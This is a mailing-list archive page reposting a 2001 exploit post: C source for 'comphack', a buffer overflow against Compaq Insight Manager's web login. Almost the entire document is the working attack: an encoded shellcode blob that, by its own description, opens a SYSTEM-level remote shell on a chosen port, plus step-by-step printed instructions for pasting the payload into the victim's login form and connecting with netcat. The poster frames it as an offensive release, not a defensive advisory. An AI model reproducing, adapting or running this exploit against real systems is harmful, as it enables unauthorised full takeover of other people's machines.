comphack - Compaq Insight Manager Remote SYSTEM shell

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Mailer: SecurityFocus

I'm running out of Win32 vulnerabilities to exploit 
here...Anyone got any ideas?

Cheers,

Indigo.



/*	comphack.c - Compaq Insight Manager 
overflow exploit by Indigo <indig0@talk21.com> 2001

	Usage: comphack <victim port>

	This code has been compiled and tested 
on Linux and Win32

	The shellcode spawns a SYSTEM shell on 
the chosen port

	Main shellcode adapted from code written 
by izan@deepzone.org

	Greets to:

	Morphsta, Br00t, Macavity, Jacob & 
Monkfish...Not forgetting D-Niderlunds
*/

/* #include <windows.h> uncomment if compiling on 
Win32 */
#include <stdio.h>

int main(int argc, char **argv)
{
				
unsigned char shellcode[] = 

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77
\xFF\xE1\x03\x10"
"\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7
\x31\xC9\xB1\x6F"
"\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07
\x31\xDB\xB3\x18"
"\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3
\x1D\x01\xDF\x29\x07"
"\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07
\xB3\x05\x01\xDF"
"\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07
\xB3\x12\x01\xDF"
"\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01
\xDF\x29\x07\xB3\x14"
"\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3
\x3F\x01\xDF\x29\x07"
"\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07
\xB3\x08\x01\xDF"
"\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01
\xDF\x29\x07\x66\x81"
"\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07
\x47\x47\x47\x47"
"\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7
\x5F\x5F\x5F\x5F"
"\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2
\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
"\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7
\xAD\x5D\x5F\x5F\xD2"
"\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35
\x55\xCF\xCF\xCF"
"\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09"
"\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09\xA0\xCA"
"\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09\xD2\xEA\xB2"
"\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0
\xCA\x6C\x7A\x1F"
"\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2
\xEA\xAA\x7A\x1F"
"\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79
\x1F\x5F\xF2\x0F"
"\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79
\x1F\x5F\xF2\x0F\xA0\xCA"
"\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2
\xE2\x72\x79\x1F\x5F"
"\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2
\x6E\x79\x1F\x5F\xF4\xD2"
"\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79
\x1F\x5F\x5F\x5F\x5F\x5F"
"\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2
\xEA\x66\x79\x1F\x5F"
"\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35
\x5F\x35\x4F\x35\x5E"
"\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35
\x5F\xA0\xCA\x64"
"\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37
\x5F\x5D\x5F\x5F\xA0\xCA"
"\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79
\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
"\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35
\x5C\x0C\xA0\xCA\x5D\x7A"
"\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09"
"\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79
\x1F\x5F\xF4\x6C\xBF"
"\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2
\x3A\x79\x1F\x5F\x08"
"\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x60\x7A\x1F"
"\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2
\x3A\x79\x1F\x5F\x5D"
"\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79
\x1F\x5F\x5E\x7F\x5F\x5F"
"\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79
\x1F\x5F\x5F\x7F\x5F\x5F"
"\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79
\x1F\x5F\x08\x0F"
"\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6
\x7A\x1F\x5F\xF2\x0F\xA0"
"\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10
\x7A\x1F\x5F\xD4\xDA\x3A"
"\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2\xEA"
"\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55
\x7A\x1F\x5F\x35\x5F\xD2\xE2"
"\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38
\xA0\xA0\xA0\x35"
"\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2"
"\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51
\x7A\x1F\x5F\xD6\xDA\x3E"
"\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08
\x0F\xD2\xEA\x0E"
"\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2
\x0F\xA0\xCA\x14"
"\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35
\x5F\xD4\xDA\x3E"
"\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4
\xDA\x0E\x79\x1F"
"\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x18\x7A\x1F\x5F"
"\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0
\xA0\xD2\xEA\x06"
"\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2
\xEA\x02\x79\x1F"
"\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0
\xCA\x08\x7A\x1F"
"\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\x04\x06\x08"
"\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\xF3\xDB"
"\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10
\x1C\x14\x6C\x6D"
"\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31
\x3B\x5F\x33\x36\x2C"
"\x2B\x3A\x31
\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31
\x3B\x5F"
"\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30
\x3C\x34\x3A\x2B"
"\x5F\x14\x1A\x2D\x11\x1A\x13
\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
"\x0F\x36\x2F\x3A\x5F\x18
\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
"\x31\x39\x30
\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30
\x3C\x3A"
"\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32
\x3A\x3B\x0F\x36\x2F"
"\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30
\x3C\x5F\x2D\x3A"
"\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36
\x2B\x3A\x19\x36\x33\x3A"
"\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30
\x2C\x3A\x17\x3E\x31\x3B"
"\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30
\x3C\x3A\x2C\x2C\x5F\x1C"
"\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31
\x7F\x63\x36\x25"
"\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71
\x30\x2D\x38\x61"
"\x5D\x5F\x40\x17
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
"\x53
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x
5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x1C\x12\x1B\x71\x1A\x07
\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x56\x56\x56\x56\x56\x00";
		
FILE *fp;
unsigned short int      a_port;

printf ("\nCompaq Insight Manager overflow 
launcher\nby Indigo <indig0@talk21.com> 2001\n\n");
printf ("This program will generate a binary file called 
exploit.bin\n");
printf ("Connect to the victim using a web browser 
http://victim:2301\n";);
printf ("Next to \'Login Account\', click on 
\'anonymous\'\n");
printf ("Enter some random characters into the 
\'password\' field\n");
printf ("Open exploit.bin in notepad, highlight it then 
copy to the clipboard\n");
printf ("Paste the exploit into the \'Name\' field and 
click OK\n");
printf ("\nLaunch netcat: nc <victim host> <victim 
port>\n");
printf ("\nThe exploit spawns a SYSTEM shell on the 
chosen port\n\n");

if (argc != 2)
{
	printf ("Usage: %s <victim port>\n", argv[0]);
	exit (0);
}

a_port = htons(atoi(argv[1]));
a_port^= 0x5f5f;
       
shellcode[1650]= (a_port) & 0xff;
shellcode[1651]= (a_port >> 8) & 0xff;

fp = fopen ("./exploit.bin","wb");

fputs (shellcode,fp);

fclose (fp);
	
return 0;

}
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux